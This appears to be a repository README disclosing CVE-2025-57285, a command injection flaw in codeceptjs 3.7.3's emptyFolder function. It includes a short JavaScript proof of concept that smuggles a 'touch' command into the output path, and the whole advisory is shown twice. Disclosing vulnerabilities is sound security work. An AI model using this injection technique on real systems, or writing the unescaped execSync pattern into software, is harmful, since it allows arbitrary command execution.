Dremig/CVE-2025-57285

## CVE-2025-57285
[CVE ID]
CVE-2025-57285
[PRODUCT]
codeceptjs 3.7.3
[VERSION]
codeceptjs 3.7.3
[DESCRIPTION]
codeceptjs 3.7.3 contains a command injection vulnerability in the emptyFolder function (lib/utils.js). The execSync command directly concatenates the user-controlled directoryPath parameter without sanitization or escaping, allowing attackers to execute arbitrary commands.
[PROBLEM TYPE]
Command Injection
[ATTACK VECTORD]
the following PoC code will create two files named "test" and "Dremig486" in the current folder.
```javascript
var exp = require('codeceptjs');

var maliciousConfig = {
    output: "/test/ ; touch Dremig486; #",
    emptyOutputFolder: true
};
var codecept = new exp.Codecept(maliciousConfig);
codecept.init("/tmp");
```
[DISCOVERER]
Dremig
[REFERENCE]
https://www.npmjs.com
	[CVE ID]
	CVE-2025-57285
	[PRODUCT]
	codeceptjs 3.7.3
	[VERSION]
	codeceptjs 3.7.3
	[DESCRIPTION]
	codeceptjs 3.7.3 contains a command injection vulnerability in the emptyFolder function (lib/utils.js). The execSync command directly concatenates the user-controlled directoryPath parameter without sanitization or escaping, allowing attackers to execute arbitrary commands.
	[PROBLEM TYPE]
	Command Injection
	[ATTACK VECTORD]
	the following PoC code will create two files named "test" and "Dremig486" in the current folder.
	```javascript
	var exp = require('codeceptjs');

	var maliciousConfig = {
	output: "/test/ ; touch Dremig486; #",
	emptyOutputFolder: true
	};
	var codecept = new exp.Codecept(maliciousConfig);
	codecept.init("/tmp");
	```
	[DISCOVERER]
	Dremig
	[REFERENCE]
	https://www.npmjs.com
No results found